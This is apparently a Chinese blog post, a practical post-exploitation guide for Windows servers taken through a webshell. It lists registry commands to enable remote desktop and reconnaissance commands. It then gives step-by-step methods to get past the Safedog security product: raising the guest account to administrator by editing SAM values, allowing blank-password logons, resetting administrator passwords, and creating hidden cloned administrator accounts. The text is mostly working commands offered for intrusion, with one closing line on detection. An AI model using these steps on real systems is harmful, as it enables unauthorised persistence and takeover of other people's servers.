windows后渗透实用小结

windows后渗透实用小结

webshell后开启服务器3389端口

开启3389命令

只适用于:Win7、Win2003、XP系统,windows2012不行
命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

windows server 2000
新建文件 3389.reg 内容如下:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]
"PortNumber"=dword:00000D3D

regedit /s C:/www/3389.reg

查询远程桌面服务开启状态

查询系统是否开启远程桌面服务,命令如下:

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

执行结果如图1所示:

如果fDenyTSConnections的值为0x1则表示关闭;0x0表示开启。

查询远程桌面服务端口号

查询远程桌面服务端口号,命令如下:

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

查询结果如图2所示:

端口格式为16进制,0xd3d转换为十进制是3389。

开启远程桌面服务

如果远程桌面服务关闭的话,则需要开启,命令如下:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

查看进程列表

tasklist

tasklist /svc    #查看当前进程及PID号

Termsevice为远程桌面管理
找到TermSevice的PID

tasklist /svc | findstr "TermService"

netstat -ano | find "PID"

即可查找到真正远程服务的端口信息

dos命令大全

查看版本:ver
查看权限:whoami
查看配置:systeminfo
查看用户:net user
查看正在运行的服务:tasklist /svc
查看开放的所有端口:netstat -ano
查询登录用户名:query user
查询端口开放情况:netstat -ano | findstr “LISTENING”

提权绕过安全狗加账号的方法

前面有几个打狗棍法没写,因为没用,开着安全狗,上传的exe无法执行而且一会儿就被删了。
下面说几个可行的办法:

打狗棍法一

首先,用guest,演示一下,具体操作是通过注册表,篡改sam下用户的F值,使其达到管理权限.
首先要是system权限,administrator对应值是1F4,GUEST是1F5
下面是步骤:
1.使用net user guest 1 ,将guest密码重置为1或者其他的密码,无需过问是guest否禁用
2.执行:

reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "C:\Recovery\7a284e0d-0bf0-11e2-892c-dd57e9ebb1a5\1.reg"

导出administrator的注册表到某路径下,修改内容,将”V”值删除,只留F值,将1F4修改为1F5,保存。
3.修改后执行regedit /s C:\Recovery\7a284e0d-0bf0-11e2-892c-dd57e9ebb1a5\1.reg 导入注册表
就可以使用,guest 密码 1登陆了。
安全狗说:在账户保护全开的情况下,如果不能更改密码呢?!

打狗棍法二

如果真的不能更改密码呢?则使用vbs查看iis用户密码,再使用

reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\names\用户名" "C:\Recovery\7a284e0d-0bf0-11e2-892c-dd57e9ebb1a5\2.reg"

查看其对应值,再重复以上第二步和第三步,使用查看到的明文密码登陆
安全狗又说:
如果不允许修改密码,iis用户是禁止登陆远程桌面的呢?

打狗棍法三

对啊,我们该怎么办?继续听我说,大家都知道guest是空密码,那我们就使用空密码登陆。
执行

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v limitblankpassworduse /t REG_DWORD /d 0 /f

修改limitblankpassworduse值为1,重复上面第二第三步骤,继续登陆。

打狗棍法四

万不得以的时候用,建议不用
查询在线用户query user
直接修改管理员密码~

隐藏、克隆账号

window 隐藏系统用户制作:
1、CMD命令行下,建立了一个用户名为“test$”,密码为“abc123!”的简单隐藏账户,并且把该隐藏账户提升为了管理员权限。

PS:CMD命令行使用”net user”,看不到”test$”这个账号,但在控制面板和本地用户和组是可以显示此用户的。
2、“开始”→“运行”,输入“regedt32.exe”后回车,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”,单机右建权限,把名叫:administrator的用户给予:完全控制以及读取的权限,在后面打勾就行,然后关闭注册表编辑器,再次打开即可。

3、来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,点击test$用户,得到在右边显示的键值中的“类型”一项显示为0x3ec,找到箭头所指目录。

4、扎到administrator所对应的的项为“000001F4”,将“000001F4”的F值复制到“000003EC”的F值中,保存。

5、分别将test$和“000003EC导出到桌面,删除test$用户 net user test$ /del

6、将刚才导出的两个后缀为.reg的注册表项导入注册表中。这样所谓的隐藏账户就创建好了。
PS:不管你是在命令提示符下输入net user 或者在系统用户管理界面都是看不到test$r这个账户的,只有在注册表中才能看得到。
检测和清理方法:
使用D盾_web查杀工具,使用克隆账号检测功能进行查看,可检测出隐藏、克隆账号。

参考链接

http://www.96sec.org/blog/post/77.html
https://www.cnblogs.com/xiaozi/p/7613288.html